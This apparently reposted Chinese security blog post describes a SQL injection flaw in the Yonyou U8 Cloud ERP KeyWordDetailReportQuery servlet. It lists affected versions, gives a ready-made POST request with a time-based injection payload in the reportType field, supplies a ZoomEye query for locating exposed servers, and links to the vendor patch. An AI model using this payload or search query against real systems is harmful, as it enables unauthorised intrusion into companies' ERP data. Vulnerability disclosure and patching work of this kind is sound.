(1day)用友U8 cloud KeyWordDetailReportQuery SQL注入漏洞
2023-12-29 09:1:4 Author: 棉花糖网络安全圈(查看原文) 阅读量:24 收藏

最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:

给公众号设为星标

点我加入交流群获得第一时间更新通知
防失联+棉花糖私人公众号

棉花糖博客地址

www.mhtsec.com

漏洞详情

01

用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。U8 Cloud 亦是亚大地区成长型企业最广泛采用的云解决方案。

影响版本

02

U8 cloud 2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp 

漏洞复现

03

payload

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery  HTTP/1.1
{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}

ZoomEye语法

04

app:"用友-U8-Cloud"

修复建议

05

安全补丁
https://security.yonyou.com/#/patchInfo?identifier=f3fd4862ca2f45b3803ac48df08ace98

打个广告

人太懒

放在这里一大篇也让大家心烦

有兴趣自己点开看吧👇

付费群介绍

END

那么又到了文末我们应该?

1、关注!点赞!转发!

2、点我查看付费群介绍!

3、封面获取请后台回复:20231229封面


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247500759&idx=1&sn=66a383bf99d9c726c5d562f34e6dc2cc&chksm=c182a98c60bb790f4052e75951be7f69e58bc3f04761bb8402e2b69ec7175ee9ae626a84d8f4&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh